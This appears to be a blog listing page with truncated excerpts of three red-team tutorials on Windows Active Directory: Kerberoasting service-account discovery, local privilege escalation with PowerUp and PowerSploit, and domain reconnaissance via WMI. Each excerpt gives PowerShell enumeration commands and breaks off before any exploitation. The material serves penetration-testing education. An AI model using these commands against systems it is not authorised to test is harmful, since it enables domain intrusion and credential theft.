Powershell * RED TEAM SECURITY

Domain Privilege Escalation

Domain Priv Escalation : Kerberoast:- Find service account: GetUserSPNs https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1 Powerview: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetUser –SPN Active directory Module: PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Import-ActiveDirectory.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADUser -filter {ServicePrincipalName -ne “$null”} -Properties serviceprincipalname If we are getting error of “You cannot call a method on a null-valued expression” Then use below command to […]

Powershell * RED TEAM SECURITY

Local Privilege Escalation

PowerUP: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> cd .\PowerUp\ PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> dir PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> . .\PowerUp.ps1 Get services with unquoted paths and a space in their executable path: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> Get-ServiceUnquoted –vebose Get services where the current user can write to its binary path: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Import-Module .\PowerSploit.psm1 PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-ModifiableService –verbose Get the services which current user can […]

Powershell * RED TEAM SECURITY

Information Gathering – Active Directory

PS C:\Windows\system32> Get-WmiObject -Namespace root\directory\ldap –List PS C:\Windows\system32> Get-CimClass -Namespace root\directory\ldap Get the current domain: It will give name of current domain: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-WmiObject -Namespace root/directory/ldap -Class ds_domain | select -ExpandProperty ds_dc PS C:\Windows\system32> (Get-WmiObject -Class win32_computersystem).domain Get the current domain policy: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-WmiObject -Namespace root/directory/ldap -Class ds_domain | select DS_lockoutduration, DS_Lockoutobservationwindow, DS_locakoutThreshold, […]